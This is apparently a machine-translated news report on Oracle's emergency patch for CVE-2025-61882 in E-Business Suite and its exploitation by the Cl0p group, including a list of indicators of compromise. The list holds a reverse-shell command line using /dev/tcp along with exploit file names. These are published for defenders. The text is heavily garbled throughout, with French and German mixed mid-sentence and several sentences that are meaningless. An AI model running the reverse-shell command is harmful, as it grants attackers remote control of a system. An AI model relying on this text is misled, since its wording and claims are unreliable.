Après un incident criminel en raison de l’accident de sécurité, le logiciel a installé un correctif pour CVE-2025-61882.
Oracle a une mise à jour Notfall qui s’avère être une excellente sécurité dans votre E-Business Suite (EBS) pour vous. Das Leck mit Kennung CVE-2025-61882 a un score CVSS de 9,8 et est disponible auprès des jeunes puits de Cl0p pour un score de date généré.
L’accès à la sécurité ne s’effectue pas à proximité d’un système de traitement fiable, il ne s’agit pas d’un accord authentifié avec des outils de réseau à l’aide de HTTP ermöglichen soll, le composant Oracle Concurrent-Processing pour effectuer des compromis et donc le contrôle pour übernehmen.
Zugriff aus der Ferne
« Cet accès à la sécurité peut être effectué sans authentification à distance, ainsi que via une entreprise de réseau, sans nom d’utilisateur et mot de passe », selon Oracle. Bei erfolgreichem Exploit sei ein Angreifer dann in der Lage, über die Sicherheitslücke aus der Ferne bösartigen Code ausführen.
Laut Rob Duhart, directeur de la sécurité d’Oracle, a contacté les fournisseurs d’indicateurs pour une mise en œuvre d’une coopération (IoCs). Les adresses IP et les articles suivants doivent être sélectionnés pour une des meilleures mises à jour du groupe Scattered LAPSUS$ Hunters et de l’exploit dans :
- 200.107.207(.)26 (Potentiel GET et POST-Activität)
- 185.181.60(.)11 (Potentiel GET et POST-Activität)
- sh -c /bin/bash -i >& /dev/tcp// 0>&1 (une connexion TCP établie via un port optimal)
- oracle_ebs_nday_exploit_poc_scattered_lapsus_retard_cl0p_hunters.zip
- oracle_ebs_nday_exploit_poc_scattered_lapsus_retard-cl0p_hunters/exp.py
- oracle_ebs_nday_exploit_poc_scattered_lapsus_retard-cl0p_hunters/server.py
Promotion par courrier
L’organisme de sécurité obligatoire signale les violations comme une « campagne massive d’e-mails », les centaines de personnes compromettent les contacts au préalable. « Cl0p propose de plus amples informations sur Oracle EBS et se connecte donc en août 2025 de grandes dates de plus de possibilités d’utilisation », a déclaré Charles Carmakal, CTO de Mandiant, dans un message LinkedIn.
Il s’ensuit que de plus amples informations sur les mises à jour de patch ont été publiées, en indiquant « Schwachstellen, die im Oracle-Update vom Juli 2025 gepatcht wurden, sowie aine, the and this Wochenende gepatcht wurde (CVE-2025-61882). »
Les mesures prises pour l’installation massive du Zero-Day-Ausnutzung (et l’wahrscheinlich weiteren N-Day-Ausnutzung par d’autres acteurs) doivent être prises en charge par le Zeitpunkt der Patch-Anwendung prüfen, ob sie bereits kompromittiert wurden », donc Carmakal.
![]()



